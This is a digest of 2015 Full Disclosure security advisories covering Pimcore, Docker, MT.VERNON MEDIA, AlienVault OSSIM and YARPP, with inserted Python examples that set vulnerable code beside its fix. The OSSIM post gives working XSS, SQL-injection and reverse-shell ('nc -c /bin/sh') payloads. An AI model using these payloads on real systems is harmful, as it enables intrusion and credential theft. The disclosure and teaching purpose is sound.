[FD] Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities

2015-05-08 Thread Vulnerability Lab
Document Title:
===
Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1482


Release Date:
=
2015-05-08


Vulnerability Laboratory ID (VL-ID):

1482


Common Vulnerability Scoring System:

6.2


Product & Service Introduction:
===
Pimcore is a powerful and robust Zend Framework based PHP content management 
system (CMS) for creating and managing digital 
content and assets licensed under the open-source BSD license. Create 
outstanding digital experiences on the most flexible 
content management platform available. Manage and edit any type of digital 
content, for any device and channel in a 100% 
flexible and personalized way. Pimcore features award-winning single-source and 
multi-channel publishing functionality 
making it easy to manage, update, and integrate content and data from various 
sources. With pimcore brands can create 
and manage rich digital experiences for all of their output channels at once: 
web, mobile, apps, social platforms, 
print and digital signage. With pimcore you can truly `edit once & reuse 
anywhere`.

(Copy of the Homepage: https://www.pimcore.org/ )


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered multiple 
vulnerabilities in the official PIM Core v3.0.5 Content Management System.


Vulnerability Disclosure Timeline:
==
2015-05-01: Researcher Notification & Coordination (Alain Homewood - PwC 
New Zealand)
2015-05-01: Vendor Notification (PimCore CMS Security Team)
2015-05-05: Vendor Response/Feedback (PimCore CMS Security Team)
2015-05-07: Vendor Fix/Patch (PimCore Developer Team)
2015-05-08: Public Disclosure (Vulnerability Laboratory - Alain Homewood)


Discovery Status:
=
Published


Affected Product(s):

Pimcore GmbH
Product: PimCore - Content Management System 3.0.5


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

1.1
A (time-based) blind SQL injection web vulnerability has been discovered in the 
official Pimcore v3.0.5 Content Management System (web-application).
The vulnerability allows remote attackers or privileged user accounts to 
execute their own SQL commands to compromise the affected web-server DBMS.

A blind authenticated SQL injection vulnerability exists in the filtering 
functionality of the HTTP error display in the administration panel. 
Authentication is required to exploit this vulnerability; however, low-privilege 
users may have access to this functionality (i.e. it is located 
under `Marketing - Search Engine Optimisation`). The request method to execute 
the malicious SQL commands is GET and the issue exists in 
the code line of the web-application.

The security risk of the sql vulnerability is estimated as high with a cvss 
(common vulnerability scoring system) count of 6.2.
Exploitation of the remote sql injection web vulnerability requires a low 
privilege application user account without user interaction. 
Successful exploitation of the sql injection vulnerability results in 
application and web-service or dbms compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./misc/http-error-log

Vulnerable Parameter(s):
[+] _dc


1.2
A command execution web vulnerability has been discovered in the official 
Pimcore v3.0.5 Content Management System (web-application).
The vulnerability allows remote attackers or local privileged user accounts to 
compromise the web-server by execution of malicious code.

The newsletter sending functionality uses unsanitized user-provided input as 
part of a shell command. Authenticated users can manipulate 
these values to execute arbitrary commands. Note that low-privilege users are 
likely to have access to this functionality (e.g. marketing users). 
Authentication is required to exploit this vulnerability. The request method to 
execute is POST and the attack vector is located on the 
application-side of the online service.

The security risk of the arbitrary code execution vulnerability is estimated as 
high with a cvss (common vulnerability scoring system) count of 6.1.
Exploitation of the arbitrary code execution vulnerability requires no user 
interaction but a low privilege web-application user account.
Successful exploitation of the remote vulnerability results in unauthorized 
execution of system specific codes.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] 
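The newsletter issue above is the classic shell-string pattern: request input spliced into a command line that a shell then re-parses. The following is an added example and not Pimcore's code; the newsletter helper, its arguments and the `echo` that stands in for the real mailer binary are hypothetical. It runs the vulnerable builder beside the hardened one (argv list, no shell, plus an allow-list on the value) so the difference is visible in the output:

```python
"""Shell-command construction: vulnerable string building beside the hardened form.

Added example, not Pimcore's code: the newsletter helper, its arguments and the
`echo` standing in for the real mailer binary are hypothetical.
"""
import re
import subprocess

# Constructed attacker-controlled value: a `;` ends the intended command and
# whatever follows runs as a second command if a shell ever parses the string.
PAYLOAD = "victim@example.com; echo INJECTED"

# Loose e-mail allow-list; a value that does not match never reaches a process.
RECIPIENT_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def send_unsafe(recipient: str) -> list[str]:
    """Vulnerable pattern: request input interpolated into a shell command line."""
    cmd = f"echo sending to {recipient}"            # hypothetical mailer invocation
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True, check=False)
    return out.stdout.splitlines()


def send_safe(recipient: str) -> list[str]:
    """Hardened pattern: no shell, argv list, so the value stays a single argument."""
    argv = ["echo", "sending", "to", recipient]     # hypothetical mailer invocation
    out = subprocess.run(argv, capture_output=True, text=True, check=False)
    return out.stdout.splitlines()


def is_plausible_recipient(value: str) -> bool:
    """Allow-list check to run before any subprocess, in addition to using argv."""
    return RECIPIENT_RE.fullmatch(value) is not None


if __name__ == "__main__":
    print("unsafe:", send_unsafe(PAYLOAD))   # two lines: the second is the injected command
    print("safe:  ", send_safe(PAYLOAD))     # one line: the payload is printed literally
    print("allow-list accepts payload:", is_plausible_recipient(PAYLOAD))
```

The argv form is the real fix; the allow-list is defence in depth, since a mailer binary may interpret leading dashes or other characters in its own arguments.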

Re: [FD] pydio vulnerabilities

2015-05-08 Thread Julius Kivimäki
https://github.com/pydio/pydio-core/commits/develop

https://github.com/pydio/pydio-core/commit/2049254e7a215491019d2646a274a8fb1cf29e3b


2015-05-07 1:32 GMT+03:00 Just A Fake robottomonitorbugt...@gmail.com:

 Does anyone have any info on the two pydio vulnerabilities announced today?

 They have been given CVE-2015-3431 and CVE-2015-3432 but a search on mitre
 just says those are reserved.

 There is no information or explanation about what the issues are.


 https://pyd.io/pydio-core-6-0-7/?utm_source=Pydio+Releases&utm_campaign=85ba0d8870-Pydio_6_0_7_Community

 Thanks for any info anyone has.


 Robot



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security
Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection
Security Vulnerabilities
Product: Web-Design
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 08, 2015
Latest Update: May 08, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore] (@justqdjing)



*Proposition Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA


*Product & Vulnerable Versions:*
Web-Design
v1.12



*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
developed by: Mt. Vernon Media



*Product Introduction Overview:*
In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads




*(2) Vulnerability Details:*
MT.VERNON MEDIA web application has a computer security bug problem. It can
be exploited by stored XSS attacks. This may allow a remote attacker to
create a specially crafted request that would execute arbitrary script code
in a user's browser session within the trust relationship between their
browser and the server.

Several other MT.VERNON MEDIA products 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. Openwall software releases and other related files
are also available from the Openwall file archive and its mirrors. You are
encouraged to use the mirrors, but be sure to verify the signatures on
software you download. The more experienced users and software developers
may use our CVSweb server to browse through the source code for most pieces
of Openwall software along with revision history information for each
source file. We publish articles, make presentations, and offer
professional services. Openwall has published suggestions, advisories and
solution details related to SQL Injection vulnerabilities.


*(2.1) *The first programming code flaw occurs at section.php? page with
id parameter.

*(2.2) *The second programming code flaw occurs at illustrated_verse.php?
page with id parameter.

*(2.3) *The third programming code flaw occurs at image.php? page with
id parameter.






*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple_8.html
https://progressive-comp.com/?a=139222176300014&r=1&w=1
http://whitehatpost.blog.163.com/blog/static/242232054201548925221/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=44951
https://www.bugscan.net/#!/x/21160
http://bluereader.org/article/27452998







--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
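The three flaws listed above are all the same shape: an `id` query parameter pasted into SQL text. The block below is an added example and not MT.VERNON MEDIA's code; the `sections` and `users` tables, their rows and the request values are constructed here on an in-memory SQLite database. It shows the string-built query beside the bound-parameter version, with a filter bypass and a cross-table read that only the former allows:

```python
"""SQL injection through an `id` parameter: string-built query beside a bound parameter.

Added example, not MT.VERNON MEDIA's code: the `sections` and `users` tables,
their rows and the request values are constructed here, using SQLite in memory.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's content and user tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sections (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO sections VALUES (?, ?, ?)",
        [(1, "Home", 1), (2, "Illustrated verse", 1), (3, "Draft: unpublished", 0)],
    )
    conn.execute("CREATE TABLE users (login TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-hash')")
    return conn


def section_title_unsafe(conn: sqlite3.Connection, page_id: str) -> list[str]:
    """Vulnerable: the raw `id` request value is pasted into the SQL text."""
    sql = f"SELECT title FROM sections WHERE published = 1 AND id = {page_id}"
    return [row[0] for row in conn.execute(sql)]


def section_title_safe(conn: sqlite3.Connection, page_id: str) -> list[str]:
    """Hardened: type-check the value, then bind it; the SQL text never changes."""
    if not page_id.isdigit():
        return []      # assumed policy: anything but a plain integer is a bad request
    sql = "SELECT title FROM sections WHERE published = 1 AND id = ?"
    return [row[0] for row in conn.execute(sql, (int(page_id),))]


# Constructed attacker values for `?id=`.
BYPASS_FILTER = "1 OR 1=1 --"                                      # published=1 no longer limits the rows
DUMP_USERS = "0 UNION SELECT login || ':' || pass FROM users --"   # reads a different table

if __name__ == "__main__":
    db = make_db()
    for value in ("2", BYPASS_FILTER, DUMP_USERS):
        print(f"id={value!r}")
        print("  unsafe ->", section_title_unsafe(db, value))
        print("  safe   ->", section_title_safe(db, value))
```

The `--` comment in both payloads discards whatever the original query appended after the parameter, which is why the `published = 1` condition and anything following it stop mattering once the attacker controls the text.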

[FD] Docker 1.6.1 - Security Advisory [150507]

2015-05-08 Thread Eric Windisch
Docker Engine version 1.6.1 has been released to address several
vulnerabilities and is immediately available for all supported platforms.
Users are advised to upgrade existing installations of the Docker Engine
and use 1.6.1 for new installations.

It should be noted that each of the vulnerabilities allowing privilege
escalation may only be exploited by a malicious Dockerfile or image.  Users
are advised to run their own images and/or images built by trusted parties,
such as those in the official images library.

Please send any questions to secur...@docker.com.




[CVE-2015-3629] Symlink traversal on container respawn allows local
privilege escalation



Libcontainer version 1.6.0 introduced changes which facilitated a mount
namespace breakout upon respawn of a container. This allowed malicious
images to write files to the host system and escape containerization.

Libcontainer and Docker Engine 1.6.1 have been released to address this
vulnerability. Users running untrusted images are encouraged to upgrade
Docker Engine.

Discovered by Tõnis Tiigi.


==

[CVE-2015-3627] Insecure opening of file-descriptor 1 leading to privilege
escalation

==

The file-descriptor passed by libcontainer to the pid-1 process of a
container has been found to be opened prior to performing the chroot,
allowing insecure open and symlink traversal. This allows malicious
container images to trigger a local privilege escalation.

Libcontainer and Docker Engine 1.6.1 have been released to address this
vulnerability. Users running untrusted images are encouraged to upgrade
Docker Engine.

Discovered by Tõnis Tiigi.


==

[CVE-2015-3630] Read/write proc paths allow host modification & information
disclosure

==

Several paths underneath /proc were writable from containers, allowing
global system manipulation and configuration. These paths included
/proc/asound, /proc/timer_stats, /proc/latency_stats, and /proc/fs.

By allowing writes to /proc/fs, it has been noted that CIFS volumes could
be forced into a protocol downgrade attack by a root user operating inside
of a container. Machines having loaded the timer_stats module were
vulnerable to having this mechanism enabled and consumed by a container.

We are releasing Docker Engine 1.6.1 to address this vulnerability. All
versions up to 1.6.1 are believed vulnerable. Users running untrusted
images are encouraged to upgrade.

Discovered by Eric Windisch of the Docker Security Team.

===

[CVE-2015-3631] Volume mounts allow LSM profile escalation

===

By allowing volumes to override files of /proc within a mount namespace, a
user could specify arbitrary policies for Linux Security Modules, including
setting an unconfined policy underneath AppArmor, or a docker_t policy for
processes managed by SELinux. In all versions of Docker up until 1.6.1, it
is possible for malicious images to configure volume mounts such that files
of proc may be overridden.

We are releasing Docker Engine 1.6.1 to address this vulnerability. All
versions up to 1.6.1 are believed vulnerable. Users running untrusted
images are encouraged to upgrade.

Discovered by Eric Windisch of the Docker Security Team.



AppArmor policy improvements



The 1.6.1 release also marks preventative additions to the AppArmor policy.
Recently, several CVEs against the kernel have been reported whereby mount
namespaces could be circumvented through the use of the sys_mount syscall
from inside of an unprivileged Docker container. In all reported cases, the
AppArmor policy included in libcontainer and shipped with Docker has been
sufficient to deflect these attacks. However, we have deemed it prudent to
proactively tighten the policy further by outright denying the use of the
sys_mount syscall.

Because this addition is preventative, no CVE-ID is requested.

-- 
Regards,
Eric Windisch
Docker Security Team
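CVE-2015-3631 above turns on a volume spec whose container-side path lands under /proc. The following is an added example, not Docker's code: an admission check a wrapper or CI step could run over `-v host:container[:opts]` specs before they reach the engine. The spec grammar it accepts and the protected-prefix list are assumptions of the example; the point it makes is that the comparison has to happen on a canonicalised path, since `..` segments and doubled slashes would otherwise slip past a naive prefix test:

```python
"""Refuse volume specs that would overlay /proc or /sys inside the container.

Added example, not Docker's code. It is an admission check of the kind a
wrapper or CI step could run over `-v host:container[:opts]` specs before
they reach the engine, aimed at the class of issue in CVE-2015-3631
(volume mounts overriding files of /proc). The spec grammar handled here
and the protected-prefix list are assumptions of this example.
"""
from __future__ import annotations

import posixpath

# Assumed policy: no bind mount may land on or beneath these container paths.
PROTECTED_PREFIXES = ("/proc", "/sys")

# Constructed specs: two benign, three that would shadow /proc or /sys entries.
SAMPLE_SPECS = [
    "/srv/app/data:/app/data",
    "/var/log/app:/var/log/app:ro",
    "/tmp/attr:/proc/self/attr",           # LSM label files under /proc
    "/tmp/fs:/proc/../proc/fs/",           # same target once normalised
    "/tmp/sec://sys//kernel/security:ro",  # doubled slashes, also normalised away
]


def parse_volume_spec(spec: str) -> tuple[str | None, str, str]:
    """Split `container`, `host:container` or `host:container:opts`."""
    parts = spec.split(":")
    if len(parts) == 1:
        return None, parts[0], ""
    if len(parts) == 2:
        return parts[0], parts[1], ""
    if len(parts) == 3:
        return parts[0], parts[1], parts[2]
    raise ValueError(f"unparseable volume spec: {spec!r}")


def container_target(spec: str) -> str:
    """Canonical absolute container path the mount would cover."""
    _, target, _ = parse_volume_spec(spec)
    if not target.startswith("/"):
        raise ValueError(f"container path must be absolute: {target!r}")
    # normpath collapses `.`, `..` and repeated slashes, but by POSIX rules it
    # keeps a leading `//` intact, so fold that down to a single slash as well.
    path = posixpath.normpath(target)
    if path.startswith("//"):
        path = "/" + path.lstrip("/")
    return path


def is_protected(path: str) -> bool:
    """True when `path` is a protected root or lies beneath one (so not `/procfs`)."""
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def check_volume_specs(specs: list[str]) -> list[str]:
    """Return the specs that must be refused; an empty list means all are acceptable."""
    return [s for s in specs if is_protected(container_target(s))]


if __name__ == "__main__":
    for bad in check_volume_specs(SAMPLE_SPECS):
        print("refuse:", bad, "->", container_target(bad))
```

Such a check belongs in front of the engine, not inside the image: the advisory's point is that the image itself is the untrusted party here.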


[FD] SAP vulnerabilities highlighted in many reports such as HP Cyber Risk Report 2015

2015-05-08 Thread Darya Maenkova
Recently, HP published their yearly Cyber Risk Report 2015 
(http://info.hpenterprisesecurity.com/LP_460192_Cross_CyberriskFullReport_0315_gate 
). While the report spotlights many of the usual topics, such as the 
growing ATM and IoT security buzz you can find everywhere, 
ERPScan found some parts which are relevant to business application 
security. We have prepared a deep article from this research, added all 
the details and also collected information from different sources about the 
growing number of SAP vulnerabilities and recent initiatives to help 
SAP users avoid issues (new security guidelines).


http://erpscan.com/press-center/blog/sap-vulnerabilities-highlighted-in-many-reports-such-as-hp-cyber-risk-report-2015/#more-7858


--

Darya Maenkova

PR manager

https://www.linkedin.com/profile/public-profile-settings?trk=prof-edit-edit-public_profile 
https://twitter.com/d_maenkova


http://erpscan.com/



e-mail: d.maenk...@erpscan.com mailto:d.maenk...@erpscan.com

address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

phone: 650.798.5255

erpscan.com http://erpscan.com




[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 Multiple XSS (Cross-site Scripting) Web
Security Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple XSS Security
Vulnerabilities
Product: Web-Design
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 07, 2015
Latest Update: May 07, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [Mathematics, Nanyang Technological
University (NTU), Singapore] (@justqdjing)




*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA



*Product & Vulnerable Versions:*
Web-Design
v1.12



*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
developed by: Mt. Vernon Media



*Product Introduction Overview:*
In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads




*(2) Vulnerability Details:*
MT.VERNON MEDIA Web-Design web application has a computer security bug
problem. It can be exploited by stored XSS attacks. This may allow a remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship
between their browser and the server.

Several other MT.VERNON MEDIA products 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. BugScan is the first community-based scanner and has
gone through five code refactorings. It has redefined the concept of the
scanner and provides sources for the latest info-sec news, tools, and
advisories. It also publishes suggestions, advisories and solution details
related to XSS vulnerabilities.


*(2.1) *The first programming code flaw occurs at section.php? page with
id parameter.

*(2.2)* The second programming code flaw occurs at illustrated_verse.php?
page with id parameter.

*(2.3)* The third programming code flaw occurs at image.php? page with
id parameter.

*(2.4) *The fourth programming code flaw occurs at gallery.php? page with
np parameter.







*References:*
http://www.tetraph.com/security/xss-vulnerability/mt-vernon-media-web-design-v1-12-multiple-xss/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple.html
http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-multiple-xss/
https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-multiple-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154885036469
https://progressive-comp.com/?a=139222176300014&r=1&w=1
https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=44832
https://www.bugscan.net/#!/x/21289
http://bluereader.org/article/30765596






--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


[FD] MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 HTML Injection Web Security
Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 gallery.php? category
parameter HTML Injection Security Vulnerabilities
Product: Web-Design v1.12
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 08, 2015
Latest Update: May 08, 2015
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing[Mathematics, Nanyang Technological
University (NTU), Singapore] (@justqdjing)



*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MT.VERNON MEDIA


*Product & Vulnerable Versions:*
Web-Design
v1.12


*Vendor URL & Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
developed by: Mt. Vernon Media



*Product Introduction Overview:*
In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads




*(2) Vulnerability Details:*
MT.VERNON MEDIA web application has a computer security bug problem. It can
be exploited by stored HTML Injection attacks. Hypertext Markup Language
(HTML) injection, also sometimes referred to as virtual defacement, is an
attack on a user made possible by an injection vulnerability in a web
application. When an application does not properly handle user supplied
data, an attacker can supply valid HTML, typically via a parameter value,
and inject their own content into the page. This attack is typically used
in conjunction with some form of social engineering, as the attack is
exploiting a code-based vulnerability and a user's trust.

Several other MT.VERNON MEDIA products 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. BugScan is the first community-based scanner and has
gone through five code refactorings. It has redefined the concept of the
scanner and provides sources for the latest info-sec news, tools, and
advisories. It also publishes suggestions, advisories and solution details
related to HTML injection vulnerabilities.


*(2.1) *The first programming code flaw occurs at category parameter in
gallery.php? page.





*References:*
http://www.tetraph.com/security/html-injection/mt-vernon-media-web-design-v1-12-html-injection/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-html.html
http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-html-injection/
https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-html-injection/
http://whitehatpost.blog.163.com/blog/static/24223205420154893850881/
https://progressive-comp.com/?l=full-disclosure&m=142907520526783&w=2
https://www.bugscan.net/#!/x/21454
http://seclists.org/fulldisclosure/2015/Apr/37
http://lists.openwall.net/full-disclosure/2015/04/15/3




--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



Re: [FD] Alienvault OSSIM/USM Multiple Vulnerabilities

2015-05-08 Thread Peter Lapp
Shortly after I posted this I received an email from Alienvault
stating that a fix is imminent and is planned to be released next week
in version 5.0.2.

Thanks to AV for getting back to me on this.



On Tue, May 5, 2015 at 9:21 PM, Peter Lapp lapp...@gmail.com wrote:
 Details
 ===

 Product: Alienvault OSSIM/USM
 Vulnerability: Multiple Vulnerabilities (XSS, SQLi, Command Execution)
 Author: Peter Lapp, lapp...@gmail.com
 CVE: None assigned
 Vulnerable Versions: Tested on 4.14, 4.15, and 5.0. It likely affects
 all previous versions as well.
 Fixed Version: No fix has been released.


 Summary
 ===

 Alienvault OSSIM is an open source SIEM solution designed to collect
 and correlate log data. The vulnerability management section of the UI
 allows a user to upload a Nessus scan in NBE format. Using a specially
 crafted NBE file, a user can exploit multiple vulnerabilities such as
 XSS, SQLi, and Command Execution. Authentication is required to
 exploit this vulnerability, but admin privileges are not required. Any
 user with access to the Vulnerabilities page can perform these
 attacks.

 The vendor was notified almost 5 months ago about this vulnerability.
 Given that they have not responded to my recent requests for updates
 and just released a major version that did not patch these issues, I
 have decided to release the details.


 Technical Details
 =

 Various fields within the NBE file can be manipulated to exploit
 certain vulnerabilities. A pretty bare template that I used to test
 these issues looked something like this:

 timestamps|||scan_start|Thu Dec 11 17:00:51 2014|
 timestamps||1.1.1.1|host_start|Thu Dec 11 17:00:52 2014|
 results|1.1.1.1|1.1.1.1|cifs (445/tcp)|1234|Security Hole|Synopsis
 :\n\nThe remote host contains a web browser that is affected by
 multiple vulnerabilities.\nOther references :
 OSVDB:113197,OSVDB:113198,OSVDB:113199,OSVDB:115035\n
 timestamps||1.1.1.1|host_end|Thu Dec 11 17:11:58 2014|
 timestamps|||scan_end|Thu Dec 11 17:16:44 2014|


 Reflective XSS
 --
 The hostname/IP portion of the NBE import is vulnerable. Putting
 <script>alert(0)</script> directly after the hostname/IP in the NBE
 will result in the javascript being reflected back when the import
 finishes.

 Stored XSS
 --
 The plugin ID portion of the NBE is vulnerable.
 Adding <script>alert(document.cookie)</script> to the plugin ID in the
 NBE will result in the script being executed every time someone views
 the HTML report in the OSSIM interface.

 Blind SQL Injection
 ---
 The plugin ID is also vulnerable to blind SQLi. Adding ' UNION SELECT
 SLEEP(20) AND '1'='1 to the plugin ID will cause the DB to sleep for
 20 seconds.

 SQL Injection
 -
 The protocol portion of the NBE is vulnerable to SQL injection.
 Take this:
 cifs (445/tcp)
 And turn it to this:
 cifs','0','1(',(select/**/pass/**/from/**/users/**/where/**/login=admin),'N');#
 (445/tcp)

 That will result in the hash of the admin password being included in
 the report. The extra '(' in '1(' is required for the ending ) in
 order to not cause an error in the Perl script that runs the import.

 Command Injection
 -
 The hostname/IP portion of the NBE is vulnerable. Adding '#nc -c
 /bin/sh 10.10.10.10 ' will result in a reverse shell as www-data
 to 10.10.10.10.
 The initial # is required to comment out the remainder of a SQL query
 that comes before the dig command where this is injected. Without it
 the script won't proceed to the required point.


 Solution
 

 There's no official patch for this yet. It is possible to restrict
 access to the Vulnerabilities page via user roles, which should
 prevent a user from exploiting this. Also, if you're not using the
 import feature, you could rename the Perl script on the file system
 that runs the import.


 Timeline
 
 01/12/2015 - Notified the vendor of the vulnerabilities.
 01/12/2015 - Vendor confirms the issue and files a defect.
 01/28/2015 - Requested an update from the vendor and was told the
 issue would be worked on in the future.
 04/20/2015 - Requested an update and informed the vendor of my intent
 to release the details. No response.
 05/05/2015 - Released details to FD.



[FD] Yet Another Related Posts Plugin (YARPP) 4.2.4 CSRF - XSS - RCE

2015-05-08 Thread Evex ola
'Yet Another Related Posts Plugin' options can be updated with no
token/nonce protection, which an attacker may exploit by tricking the website's
administrator into visiting a malformed page that will change YARPP options;
and since some options allow HTML, the attacker is able to inject malformed
JavaScript code which can lead to code execution/administrator actions when
the injected code is triggered by an admin user.
The injected JavaScript code is triggered on any post page.


Affected Versions
<= 4.2.4

